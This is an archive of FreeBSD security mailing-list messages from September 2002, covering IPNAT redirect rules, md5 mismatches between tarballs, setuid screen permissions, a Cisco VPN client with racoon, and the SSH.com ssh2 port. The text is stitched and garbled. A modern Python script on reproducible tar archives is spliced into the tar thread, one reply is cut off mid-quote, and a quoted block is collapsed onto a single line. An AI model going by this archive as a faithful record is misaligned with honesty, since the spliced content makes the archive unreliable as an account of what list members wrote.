From owner-freebsd-security Wed Sep 25 0:43:21 2002
From: "Juraj Petrik"
Subject: IPNAT + IPFILTER + DUMMYNET + FreeBSD 4.7prerelease
Date: Wed, 25 Sep 2002 09:41:44 +0200
Message-ID: <002201c26467$1fdf9270$7a01a8c0@pcjuro>

hello,
can you help me, please,

I'm trying to run a firewall using IPFilter, IPNAT and Dummynet on FreeBSD.

I've read so many HOWTOs, but I can't get redirection to another server in the
internal network working:

rl0 - WAN (194.x.x.0/24)    194.x.x.22 if FreeBSD box
rl1 - LAN (192.168.1.0/24)  192.168.1.22 if FreeBSD box
rl2 - DMZ (10.0.0.0/24)     10.0.0.22 if FreeBSD box

my server is now on LAN, not on DMZ.

I'm using FreeBSD 4.7 prerelease from CVS.
In the kernel config I have added:

options IPFIREWALL
options IPFIREWALL_VERBOSE
options IPFIREWALL_VERBOSE_LIMIT=30
options IPFIREWALL_FORWARD
options IPFIREWALL_DEFAULT_TO_ACCEPT
options IPDIVERT
options DUMMYNET

options IPFILTER
options IPFILTER_LOG
options IPFILTER_DEFAULT_BLOCK
options RANDOM_IP_ID

in /etc/rc.conf I have:

tcp_extensions="YES"
gateway_enable="YES"
portmap_enable="NO"

#firewall_enable="YES"
#firewall_type="/etc/dummynet.conf"
#firewall_logging="NO"

ipfilter_enable="YES"
ipfilter_flags=""
ipfilter_rules="/etc/ipf.conf"

ipnat_enable="YES"
ipnat_flags=""
ipnat_rules="/etc/ipnat.conf"

ipmon_enable="YES"
ipmon_flags="-Dns -l block"

in /etc/ipf.conf:

pass in log all
pass out log all

in /etc/ipnat.conf:

map rl0 192.168.1.0/24 -> 194.x.x.22/32
map rl0 0/0 -> 194.x.x.22/32 proxy port ftp ftp/tcp

map rl0 192.168.1.0/24 -> 194.x.x.22/32 portmap tcp/udp 12500:60000
map rl0 192.168.1.0/24 -> 194.x.x.22/32

rdr rl0 194.x.x.22/32 port 80 -> 192.168.1.35 port 80
rdr rl0 194.x.x.22/32 port 22 -> 192.168.1.35 port 22

NAT from the LAN to the internet works OK, but from the Internet I can't
redirect connections to the server on the LAN (192.168.1.35).

Please help me ANYBODY!!!!
-jp-

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Wed Sep 25 2:48:32 2002
From: Jimmy
To: freebsd-security@freebsd.org
Subject: tar and md5 question
Date: Wed, 25 Sep 2002 17:48:32 +0800
Message-Id: <20020925174832.3985834a.jimmy@tricom.com.ph>

Hello,

I'm playing with my tar and md5 commands, and I noticed that the md5sums of my
two (2) tar balls with the same content are not equal. Any ideas why they are
not equal?
Jimmy

From owner-freebsd-security Wed Sep 25 2:53:29 2002
From: dima <_pppp@mail.ru>
To: Jimmy
Cc: freebsd-security@freebsd.org
Subject: Re: tar and md5 question
Date: Wed, 25 Sep 2002 13:53:20 +0400
Message-ID: <3D918790.1020502@mail.ru>
References: <20020925174832.3985834a.jimmy@tricom.com.ph>

> I'm playing with my tar and md5 command, I noticed that the md5sum of my
> two (2) tar ball with the same content are not equal. Any ideas why it
> is not equal?

file times?
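dima's guess is one of several: tar writes each member's name, mode, uid/gid, owner names and mtime into a 512-byte header ahead of the file data, and md5 over the archive covers those headers, so two tarballs of identical files differ whenever any header field differs. The example below (added here, not from anyone in this thread; Python standard library only, with constructed file contents and owner ids) builds two such archives, reports which header fields caused the mismatch, and then pins those fields so the same files always produce the same bytes.

```python
"""Why tar archives of identical files can hash differently, and how to build
one that does not.  Added example for this thread, not code from any poster;
uses only the Python standard library.  File contents and owner ids below are
constructed sample data."""
import hashlib
import io
import tarfile

# Constructed sample payload: the "same content" that goes into every archive.
FILES = {"app/main.py": b"print('hello')\n", "app/README": b"demo\n"}


def build_tar(files, *, mtime, uid=1000, gid=1000, uname="jimmy",
              gname="users", mode=0o644, order=None):
    """Return the bytes of an uncompressed ustar archive holding `files`.

    Besides the data, every member gets a 512-byte header carrying its name,
    mode, uid/gid, owner names and mtime.  md5 over the archive covers those
    headers too, so a change in any of them changes the digest even though
    the file data is byte-for-byte identical."""
    buf = io.BytesIO()
    names = list(files) if order is None else list(order)
    with tarfile.open(fileobj=buf, mode="w", format=tarfile.USTAR_FORMAT) as tar:
        for name in names:
            data = files[name]
            info = tarfile.TarInfo(name)
            info.size = len(data)
            info.mtime = int(mtime)  # whole seconds, as the ustar header stores it
            info.mode = mode
            info.uid, info.gid = uid, gid
            info.uname, info.gname = uname, gname
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def md5_hex(blob):
    """Digest of the whole archive, headers included: what `md5 file.tar` sees."""
    return hashlib.md5(blob).hexdigest()


def member_data(blob):
    """Map member name -> file bytes: the part that is identical in both."""
    with tarfile.open(fileobj=io.BytesIO(blob), mode="r:") as tar:
        return {m.name: tar.extractfile(m).read() for m in tar if m.isfile()}


def header_fields(blob):
    """Per-member (name, mtime, uid, gid, uname, gname): the part that differs."""
    with tarfile.open(fileobj=io.BytesIO(blob), mode="r:") as tar:
        return [(m.name, m.mtime, m.uid, m.gid, m.uname, m.gname) for m in tar]


def diff_explained(blob_a, blob_b):
    """List (member, field, value_a, value_b) for every header field that
    differs between two archives, so the operator sees *why* the digests
    disagree.  Members are compared by position, so a different member
    order shows up as a 'name' difference."""
    names = ("name", "mtime", "uid", "gid", "uname", "gname")
    diffs = []
    for ha, hb in zip(header_fields(blob_a), header_fields(blob_b)):
        for field, va, vb in zip(names, ha, hb):
            if va != vb:
                diffs.append((ha[0], field, va, vb))
    return diffs


def build_reproducible(files):
    """Pin every header field that is not content: epoch mtime, uid/gid 0 with
    empty owner names, a fixed mode and sorted member order.  Two builds of
    the same files, on any host and at any time, then produce the same bytes,
    so their md5 can be compared meaningfully."""
    return build_tar(files, mtime=0, uid=0, gid=0, uname="", gname="",
                     order=sorted(files))


if __name__ == "__main__":
    # Same files archived a minute apart: same data, different digests.
    first = build_tar(FILES, mtime=1_033_000_000)
    second = build_tar(FILES, mtime=1_033_000_060)
    print("data equal:   ", member_data(first) == member_data(second))
    print("md5 equal:    ", md5_hex(first) == md5_hex(second))
    print("header diffs: ", diff_explained(first, second))
    # Pinned headers and sorted order: identical bytes regardless of input order.
    print("reproducible: ", md5_hex(build_reproducible(FILES)) ==
          md5_hex(build_reproducible(dict(reversed(FILES.items())))))
```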
From owner-freebsd-security Wed Sep 25 3:38: 3 2002
From: dima <_pppp@mail.ru>
To: "Ramsey G. Brenner"
Cc: Jimmy, freebsd-security@freebsd.org
Subject: Re: tar and md5 question
Date: Wed, 25 Sep 2002 14:37:53 +0400
Message-ID: <3D919201.5060102@mail.ru>
References: <20020925174832.3985834a.jimmy@tricom.com.ph> <3D918790.1020502@mail.ru> <200209250433.00182.rgbrenner@myrealbox.com>

>>> I'm playing with my tar and md5 command, I noticed that the md5sum of my
>>> two (2) tar ball with the same content are not equal. Any ideas why it
>>> is not equal?
>> file times?
> It can't be file times, since the md5 utility does not look at that
> information. The md5 utility only looks at the data in the file when it is
> trying to determine the md5 sum.

i meant tar saves file names in the archive

From owner-freebsd-security Wed Sep 25 5: 3:47 2002
From: "Peter J. Blok"
To: freebsd-security@freebsd.org
Subject: cisco/altiga client
Date: Wed, 25 Sep 2002 13:57:35 +0200
Message-Id: <200209251357.35279.Peter.Blok@inter.NL.net>

Hi,

I have the Cisco VPN 3000 (Altiga) software client on my laptop. With this
client I establish a connection with a 3000 series concentrator. I would like
to use the same software client to establish a transport connection with a
FreeBSD host running racoon.

Can somebody help me with this? Could this work?
Peter

From owner-freebsd-security Wed Sep 25 10:28:35 2002
From: "Chest Rockwell"
To: freebsd-security@freebsd.org
Subject: screen question/problem.
Date: Wed, 25 Sep 2002 12:28:32 -0500

I've used screen before. I installed a game server on my FreeBSD 4.5 box and
when I try to run screen, I get this error. I am running it as the user that
installed the server. Can anyone help me with this?

screen -A -m -d -S ./ucc-bin server BR-Anubis?XGame.xBombingRun

Must run suid root for multiuser support.
From owner-freebsd-security Wed Sep 25 11:28: 0 2002
From: Anthony Schneider
To: freebsd-security@freebsd.org
Subject: Re: screen question/problem.
Date: Wed, 25 Sep 2002 14:35:08 -0400
Message-ID: <20020925183508.GA1830@x-anthony.com>
In-Reply-To: <20020925181034.GA1570@x-anthony.com>

What are the permissions on the screen binary?
I'm guessing that it isn't suid root, and that it wants to be.
-Anthony.

On Wed, Sep 25, 2002 at 12:28:32PM -0500, Chest Rockwell wrote:
> i've used screen before. i installed a game server on my freebsd 4.5 box
> and when i try to run screen, i get this error. i am running it as the
> user that installed the server. can anyone help me with this?
>
> screen -A -m -d -S ./ucc-bin server BR-Anubis?XGame.xBombingRun
>
> Must run suid root for multiuser support.

From owner-freebsd-security Wed Sep 25 11:37:18 2002
From: Bob Fleck
To: Anthony Schneider
Cc: freebsd-security@freebsd.org
Subject: Re: screen question/problem.
Date: 25 Sep 2002 14:34:33 -0400
Message-Id: <1032978873.399.6.camel@mcp.securesoftware.com>
In-Reply-To: <20020925183508.GA1830@x-anthony.com>

You should _not_ make screen setuid root.  Anyone who uses screen could then
act as root, which would be bad.
Make the server program setuid root instead.

On Wed, 2002-09-25 at 14:35, Anthony Schneider wrote:
> What are the permissions on the screen binary?
> I'm guessing that it isn't suid root, and that it wants to be.
> -Anthony.

From owner-freebsd-security Wed Sep 25 12:13:26 2002
From: Bob Fleck
To: Matt Piechota
Cc: Anthony Schneider, freebsd-security@FreeBSD.ORG
Subject: Re: screen question/problem.
Date: 25 Sep 2002 15:10:40 -0400
Message-Id: <1032981041.399.8.camel@mcp.securesoftware.com>
In-Reply-To: <20020925144631.E90374-100000@cithaeron.argolis.org>

On Wed, 2002-09-25 at 14:53, Matt Piechota wrote:
> On 25 Sep 2002, Bob Fleck wrote:
>
> > You should _not_ make screen setuid root.  Anyone who uses screen
> > could then act as root, which would be bad.
> > Make the server program setuid root instead.
>
> Screen likes to be root so it can do things like update utmp (or wtmp,
> whichever).  Unless you find a bug, it won't let normal people become
> root, as it knows enough to drop into the calling user's permissions
> before running a shell.

Bah, you're right, wasn't thinking before I sent that.
From owner-freebsd-security Wed Sep 25 12:26:35 2002
From: Matt Piechota
To: Bob Fleck
Cc: Anthony Schneider
Subject: Re: screen question/problem.
Date: Wed, 25 Sep 2002 14:53:48 -0400 (EDT)
Message-ID: <20020925144631.E90374-100000@cithaeron.argolis.org>
In-Reply-To: <1032978873.399.6.camel@mcp.securesoftware.com>

On 25 Sep 2002, Bob Fleck wrote:

> You should _not_ make screen setuid root.  Anyone who uses screen
> could then act as root, which would be bad.
> Make the server program setuid root instead.

Screen likes to be root so it can do things like update utmp (or wtmp,
whichever).  Unless you find a bug, it won't let normal people become root,
as it knows enough to drop into the calling user's permissions before
running a shell.
--
Matt Piechota

From owner-freebsd-security Wed Sep 25 12:40:32 2002
From: Jason Stone
Subject: Re: screen question/problem.
Date: Wed, 25 Sep 2002 12:40:23 -0700 (PDT)
Message-ID: <20020925123015.Y11323-100000@walter>
In-Reply-To: <20020925144631.E90374-100000@cithaeron.argolis.org>

> Screen likes to be root so it can do things like update utmp (or wtmp,
> whichever).

I've been wondering about this for a while - on my personal systems, I've
always created a group wtmp and made utmp/wtmp/lastlog group wtmp, group
writable, and screen, xterm, etc, setgid wtmp instead of setuid root.

This seems to me to preserve that portion of the functionality (I know that
screen also likes to be setuid root for other reasons) while being
substantially safer than having everything just be setuid root.

Am I missing something?  Are there other implications to using a wtmp group
and setgid binaries?  I think that this would be a nice change to make to the
base system if it's reasonable to do so.
-Jason

-----------------------------------------------------------------------
I worry about my child and the Internet all the time, even though she's
too young to have logged on yet. Here's what I worry about. I worry that
10 or 15 years from now, she will come to me and say "Daddy, where were
you when they took freedom of the press away from the Internet?"
-- Mike Godwin

From owner-freebsd-security Wed Sep 25 13:39:54 2002
From: twig les
To: freebsd-security@FreeBSD.ORG
Subject: Re: SSH.com on FreeBSD
Date: Wed, 25 Sep 2002 13:39:50 -0700 (PDT)
Message-ID: <20020925203950.81300.qmail@web10106.mail.yahoo.com>
In-Reply-To: <20020925202404.GA3009@hades.hell.gr>

I'm switching this discussion to security because I think it's a better fit.
My bad for not doing it to begin with.
======================================================
Does this mean that the ssh.com server is installed?  I need the proprietary
daemon to compile and run instead of OpenSSH.  Someone has to have done this
already.

--- Giorgos Keramidas wrote:
> On 2002-09-25 11:09, twig les wrote:
> > Has anyone compiled and run SSH.com's ssh server on FreeBSD?
> > Specifically the boxes are running 4.6 release (fully patched of
> > course :) and we will be using secureID.  The base install is user
> > (locked down from there).
>
> You can always use the ports :-)
>
> : keramida@hades[23:23]/home/keramida$ ls -ld /usr/ports/security/ssh*
> : drwxr-xr-x  4 root  wheel  512 Sep 13 22:16 /usr/ports/security/ssh
> : drwxr-xr-x  3 root  wheel  512 Sep 24 04:06 /usr/ports/security/ssh-gui
> : drwxr-xr-x  3 root  wheel  512 Sep 13 22:16 /usr/ports/security/ssh-multiadd
> : drwxr-xr-x  4 root  wheel  512 Sep 13 22:16 /usr/ports/security/ssh2
>
> --
> Famous last words: "What duck?" -- (Terry Pratchett, Soul Music)

=====
-----------------------------------------------------------
Heavy metal made me do it.
-----------------------------------------------------------
From owner-freebsd-security Wed Sep 25 13:44:30 2002
From: billy
To: Juraj Petrik
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: IPNAT + IPFILTER + DUMMYNET + FreeBSD 4.7prerelease
Date: Wed, 25 Sep 2002 13:43:23 -0700 (PDT)
Message-ID: <20020925134258.P75126-100000@mouse.isilon.com>
In-Reply-To: <002201c26467$1fdf9270$7a01a8c0@pcjuro>

On Wed, 25 Sep 2002, Juraj Petrik wrote:

> hello,
> can you help me, please,
>
> I'm trying to run firewall with using
> IPFilter, IPNAT and Dummynet, on FreeBSD
From owner-freebsd-security Wed Sep 25 13:48: 0 2002
From: "Peter C. Lai"
To: twig les
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: SSH.com on FreeBSD
Date: Wed, 25 Sep 2002 16:47:50 -0400
Message-ID: <20020925204750.GB17502@cowbert.2y.net>
Reply-To: peter.lai@uconn.edu
In-Reply-To: <20020925203950.81300.qmail@web10106.mail.yahoo.com>

ssh.com is /usr/ports/security/ssh2

[sirmoo@cowbert]:/usr/ports/security/ssh2 % cat pkg-descr
SSH Protocols and Secure Shell

Secure Shell is the secure login program that revolutionized remote management
of networks hosts over the Internet. It is a powerful, very easy-to-use program
that uses strong cryptography for protecting all transmitted confidential
data, including passwords, binary files, and administrative commands.

The benefits of SSH include:

o Automatic authentication of users, no passwords sent in cleartext to
  prevent the stealing of passwords.
o Multiple strong authentication methods that prevent such security threats
  as spoofing identity.
o Authentication of both ends of connection, the server and the client are
  authenticated to prevent identity spoofing, trojan horses, etc.
o Automatic authentication using agents to enable strong authentication to
  multiple systems with a single-sign-on.
o Encryption and compression of data for security and speed.
o Secure file transfer.
o Tunneling and encryption of arbitrary connections.

WWW: http://www.ssh.com/

The problem now is that I don't know if you can do a -D_OVERWRITE BASE or
tricks to get it to overwrite the ossh that comes with the base install.
Someone else on -ports should be able to help with that.

On Wed, Sep 25, 2002 at 01:39:50PM -0700, twig les wrote:
> I'm switching this discussion to security because I
> think it's a better fit.  My bad for not doing it to
> begin with.
>
> ======================================================
> Does this mean that the ssh.com server is installed?
> I need the proprietary daemon to compile and run
> instead of OpenSSH.  Someone has to have done this
> already.
> > > > You can always use the ports :-) > > > > : keramida@hades[23:23]/home/keramida$ ls -ld > > /usr/ports/security/ssh* > > : drwxr-xr-x 4 root wheel 512 Sep 13 22:16 > > /usr/ports/security/ssh > > : drwxr-xr-x 3 root wheel 512 Sep 24 04:06 > > /usr/ports/security/ssh-gui > > : drwxr-xr-x 3 root wheel 512 Sep 13 22:16 > > /usr/ports/security/ssh-multiadd > > : drwxr-xr-x 4 root wheel 512 Sep 13 22:16 > > /usr/ports/security/ssh2 > > > > -- > > Famous last words: "What duck?" -- (Terry Pratchett, > > Soul Music) > > > ===== > ----------------------------------------------------------- > Heavy metal made me do it. > ----------------------------------------------------------- > > __________________________________________________ > Do you Yahoo!? > New DSL Internet Access from SBC & Yahoo! > http://sbc.yahoo.com > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- Peter C. Lai University of Connecticut Dept. of Molecular and Cell Biology Yale University School of Medicine Center for Medical Informatics | Research Assistant http://cowbert.2y.net/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 25 13:54:56 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8ADBD37B401; Wed, 25 Sep 2002 13:54:52 -0700 (PDT) Received: from isilon.com (isilon.com [65.101.129.58]) by mx1.FreeBSD.org (Postfix) with ESMTP id 05FCD43E77; Wed, 25 Sep 2002 13:54:52 -0700 (PDT) (envelope-from billy@isilon.com) Received: from mouse.isilon.com (mouse.isilon.com [172.16.5.50]) by isilon.com (8.12.2/8.11.1) with ESMTP id g8PKspUc024688; Wed, 25 Sep 2002 13:54:51 -0700 (PDT) (envelope-from billy@isilon.com) Date: Wed, 25 Sep 2002 13:53:50 -0700 (PDT) From: billy To: Juraj Petrik Cc: freebsd-security@FreeBSD.ORG, Subject: 
  Re: IPNAT + IPFILTER + DUMMYNET + FreeBSD 4.7prerelease
In-Reply-To: <002201c26467$1fdf9270$7a01a8c0@pcjuro>
Message-ID: <20020925134615.V75126-100000@mouse.isilon.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

Sorry for the previous empty post.

You don't seem to be using dummynet, ipfw, or ipdivert, so you should
probably not have them turned on in the kernel.

Are you sure that you don't have a rule that's blocking the redirect or
the response from the relevant interfaces?

I know that ipnat will not redirect packets out the same interface they
came, but that doesn't seem to be a problem here.

If you do an ipnat -l, do you see your rdr's in the listing, and do you
see any active connections after you attempt to connect from the WAN side?

-billy

On Wed, 25 Sep 2002, Juraj Petrik wrote:

> hello,
> can you help me, please,
>
> I'm trying to run a firewall using
> IPFilter, IPNAT and Dummynet on FreeBSD.
>
> I've read so many HOWTOs, but I can't do
> redirection to another server in the internal
> network:
> rl0 - WAN (194.x.x.0/24) 194.x.x.22 if FreeBSD box
> rl1 - LAN (192.168.1.0/24) 192.168.1.22 if FreeBSD box
> rl2 - DMZ (10.0.0.0/24) 10.0.0.22 if FreeBSD box
>
> my server is now on LAN, not on DMZ.
>
> I'm using FreeBSD 4.7 prerelease from CVS.
>
> In kernel config have added:
> options IPFIREWALL
> options IPFIREWALL_VERBOSE
> options IPFIREWALL_VERBOSE_LIMIT=30
> options IPFIREWALL_FORWARD
> options IPFIREWALL_DEFAULT_TO_ACCEPT
> options IPDIVERT
> options DUMMYNET
>
> options IPFILTER
> options IPFILTER_LOG
> options IPFILTER_DEFAULT_BLOCK
> options RANDOM_IP_ID
>
> in /etc/rc.conf have:
> tcp_extensions="YES"
> gateway_enable="YES"
> portmap_enable="NO"
>
> #firewall_enable="YES"
> #firewall_type="/etc/dummynet.conf"
> #firewall_logging="NO"
>
> ipfilter_enable="YES"
> ipfilter_flags=""
> ipfilter_rules="/etc/ipf.conf"
>
> ipnat_enable="YES"
> ipnat_flags=""
> ipnat_rules="/etc/ipnat.conf"
>
> ipmon_enable="YES"
> ipmon_flags="-Dns -l block"
>
> in /etc/ipf.conf:
> pass in log all
> pass out log all
>
> in /etc/ipnat.conf:
> map rl0 192.168.1.0/24 -> 194.x.x.22/32
> map rl0 0/0 -> 194.x.x.22/32 proxy port ftp ftp/tcp
>
> map rl0 192.168.1.0/24 -> 194.x.x.22/32 portmap tcp/udp 12500:60000
> map rl0 192.168.1.0/24 -> 194.x.x.22/32
>
> rdr rl0 194.x.x.22/32 port 80 -> 192.168.1.35 port 80
> rdr rl0 194.x.x.22/32 port 22 -> 192.168.1.35 port 22
>
> NAT from LAN to internet works OK,
> but from Internet I can't redirect connections to the server
> on LAN (192.168.1.35)
>
> Please help me ANYBODY!!!!
> -jp-

From owner-freebsd-security  Wed Sep 25 14:04:01 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 2749237B401 for ; Wed, 25 Sep 2002 14:03:56 -0700 (PDT)
Received: from web10102.mail.yahoo.com (web10102.mail.yahoo.com [216.136.130.52]) by mx1.FreeBSD.org (Postfix) with SMTP id D7FDB43E3B for ; Wed, 25 Sep 2002 14:03:55 -0700 (PDT) (envelope-from twigles@yahoo.com)
Message-ID: <20020925210354.73996.qmail@web10102.mail.yahoo.com>
Received: from [68.5.49.41] by web10102.mail.yahoo.com via HTTP; Wed, 25 Sep 2002 14:03:54 PDT
Date: Wed, 25 Sep 2002 14:03:54 -0700 (PDT)
From: twig les
Subject: Re: SSH.com on FreeBSD
To: peter.lai@uconn.edu
Cc: freebsd-security@FreeBSD.ORG
In-Reply-To: <20020925204750.GB17502@cowbert.2y.net>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

I guess my confusion lies in my understanding that
ssh.com's server was *not* free, thus would not ever
be in the ports collection.  I cruised around the ssh
ports and checked them out but I'm still a little
shaky.  Am I wrong here?  SSH.com made their ssh
server freely available?

--- "Peter C. Lai" wrote:
> ssh.com is /usr/ports/security/ssh2
>
> [sirmoo@cowbert]:/usr/ports/security/ssh2 % cat pkg-descr
> SSH Protocols and Secure Shell
>
> Secure Shell is the secure login program that revolutionized remote
> management of networks hosts over the Internet.
> It is a powerful, very easy-to-use program that uses strong
> cryptography for protecting all transmitted confidential data, including
> passwords, binary files, and administrative commands.
>
> The benefits of SSH include:
>
>  o Automatic authentication of users, no passwords sent in cleartext to
>    prevent the stealing of passwords.
>  o Multiple strong authentication methods that prevent such security
>    threats as spoofing identity.
>  o Authentication of both ends of connection, the server and the client
>    are authenticated to prevent identity spoofing, trojan horses, etc.
>  o Automatic authentication using agents to enable strong
>    authentication to multiple systems with a single-sign-on.
>  o Encryption and compression of data for security and speed.
>  o Secure file transfer.
>  o Tunneling and encryption of arbitrary connections.
>
> WWW: http://www.ssh.com/
>
> The problem now is that I don't know if you can do a -D_OVERWRITE BASE
> or tricks to get it to overwrite the ossh that comes with the base install.
> Someone else on -ports should be able to help with that.
>
> On Wed, Sep 25, 2002 at 01:39:50PM -0700, twig les wrote:
> > I'm switching this discussion to security because I
> > think it's a better fit.  My bad for not doing it to
> > begin with.
> >
> > ======================================================
> > Does this mean that the ssh.com server is installed?
> > I need the proprietary daemon to compile and run
> > instead of OpenSSH.  Someone has to have done this
> > already.
> >
> >
> > --- Giorgos Keramidas wrote:
> > > On 2002-09-25 11:09, twig les wrote:
> > > > Has anyone compiled and run SSH.com's ssh server on
> > > > FreeBSD?  Specifically the boxes are running 4.6
> > > > release (fully patched of course :) and we will be
> > > > using secureID.  The base install is user (locked down
> > > > from there).
> > >
> > > You can always use the ports :-)
> > >
> > > : keramida@hades[23:23]/home/keramida$ ls -ld /usr/ports/security/ssh*
> > > : drwxr-xr-x  4 root  wheel  512 Sep 13 22:16 /usr/ports/security/ssh
> > > : drwxr-xr-x  3 root  wheel  512 Sep 24 04:06 /usr/ports/security/ssh-gui
> > > : drwxr-xr-x  3 root  wheel  512 Sep 13 22:16 /usr/ports/security/ssh-multiadd
> > > : drwxr-xr-x  4 root  wheel  512 Sep 13 22:16 /usr/ports/security/ssh2
> > >
> > > --
> > > Famous last words: "What duck?" -- (Terry Pratchett, Soul Music)
> >
> > =====
> > -----------------------------------------------------------
> > Heavy metal made me do it.
> > -----------------------------------------------------------
> >
> > __________________________________________________
> > Do you Yahoo!?
> > New DSL Internet Access from SBC & Yahoo!
> > http://sbc.yahoo.com
>
> --
> Peter C. Lai
> University of Connecticut
> Dept. of Molecular and Cell Biology
> Yale University School of Medicine
> Center for Medical Informatics | Research Assistant
> http://cowbert.2y.net/

=====
-----------------------------------------------------------
Heavy metal made me do it.
-----------------------------------------------------------

__________________________________________________
Do you Yahoo!?
New DSL Internet Access from SBC & Yahoo!
http://sbc.yahoo.com

From owner-freebsd-security  Wed Sep 25 14:10:32 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id B718737B401 for ; Wed, 25 Sep 2002 14:10:29 -0700 (PDT)
Received: from odin.ac.hmc.edu (Odin.AC.HMC.Edu [134.173.32.75]) by mx1.FreeBSD.org (Postfix) with ESMTP id 30EFE43E4A for ; Wed, 25 Sep 2002 14:10:29 -0700 (PDT) (envelope-from brdavis@odin.ac.hmc.edu)
Received: from odin.ac.hmc.edu (IDENT:brdavis@localhost.localdomain [127.0.0.1]) by odin.ac.hmc.edu (8.12.3/8.12.3) with ESMTP id g8PLARj1005000; Wed, 25 Sep 2002 14:10:27 -0700
Received: (from brdavis@localhost) by odin.ac.hmc.edu (8.12.3/8.12.3/Submit) id g8PLAQeA004999; Wed, 25 Sep 2002 14:10:26 -0700
Date: Wed, 25 Sep 2002 14:10:26 -0700
From: Brooks Davis
To: twig les
Cc: peter.lai@uconn.edu, freebsd-security@FreeBSD.ORG
Subject: Re: SSH.com on FreeBSD
Message-ID: <20020925141026.A1896@Odin.AC.HMC.Edu>
References: <20020925204750.GB17502@cowbert.2y.net> <20020925210354.73996.qmail@web10102.mail.yahoo.com>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="tKW2IUtsqtDRztdT"
Content-Disposition: inline
User-Agent: Mutt/1.2.5.1i
In-Reply-To: <20020925210354.73996.qmail@web10102.mail.yahoo.com>; from twigles@yahoo.com on Wed, Sep 25, 2002 at 02:03:54PM -0700
X-Virus-Scanned: by amavisd-milter (http://amavis.org/) on odin.ac.hmc.edu
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

--tKW2IUtsqtDRztdT
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

On Wed, Sep 25, 2002 at 02:03:54PM -0700, twig les wrote:
> I guess my
> confusion lies in my understanding that
> ssh.com's server was *not* free, thus would not ever
> be in the ports collection.  I cruised around the ssh
> ports and checked them out but I'm still a little
> shaky.  Am I wrong here?  SSH.com made their ssh
> server freely available?

It used to be free for non-commercial use.  I suspect it still is, though I
stopped using it like just about everyone else when OpenSSH came out, so
I'm not sure.

-- Brooks

--
Any statement of the form "X is the one, true Y" is FALSE.
PGP fingerprint 655D 519C 26A7 82E7 2529  9BF0 5D8E 8BE9 F238 1AD4

--tKW2IUtsqtDRztdT
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE9kiZCXY6L6fI4GtQRAuHzAKDYsCCB8oaKl1jThwexzRgsm5qqUACfZiRE
S4nppS+W41miq32LfhAUhgY=
=BxlE
-----END PGP SIGNATURE-----

--tKW2IUtsqtDRztdT--

From owner-freebsd-security  Wed Sep 25 14:14:20 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id AF0CF37B401 for ; Wed, 25 Sep 2002 14:14:18 -0700 (PDT)
Received: from trillian.santala.org (ip212-226-173-33.adsl.kpnqwest.fi [212.226.173.33]) by mx1.FreeBSD.org (Postfix) with SMTP id 4DD8B43E81 for ; Wed, 25 Sep 2002 14:14:17 -0700 (PDT) (envelope-from jake@iki.fi)
Received: (qmail 45460 invoked by uid 11053); 25 Sep 2002 21:14:15 -0000
Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 25 Sep 2002 21:14:15 -0000
Date: Thu, 26 Sep 2002 00:14:14 +0300 (EEST)
From: Jarkko Santala
X-X-Sender: jake@trillian.santala.org
To: twig les
Cc: peter.lai@uconn.edu,
Subject: Re: SSH.com on FreeBSD
In-Reply-To: <20020925210354.73996.qmail@web10102.mail.yahoo.com>
Message-ID: <20020926000753.B353-100000@trillian.santala.org>
MIME-Version:
  1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

On Wed, 25 Sep 2002, twig les wrote:

> I guess my confusion lies in my understanding that
> ssh.com's server was *not* free, thus would not ever
> be in the ports collection.  I cruised around the ssh
> ports and checked them out but I'm still a little
> shaky.  Am I wrong here?  SSH.com made their ssh
> server freely available?

To make it clear and simple: Yes, it's free.  Please make sure you still
read the whole license at:

ftp://ftp.ssh.com/pub/ssh/LICENSE

Someone could patch the pkg-descr to include information on the licensing
so I wouldn't have to email about this every month. :)

-jake

--
Jarkko Santala             http://www.iki.fi/~jake/
System Administrator       2001:670:83:f08::/64

From owner-freebsd-security  Wed Sep 25 15:17:27 2002
Delivered-To: freebsd-security@freebsd.org
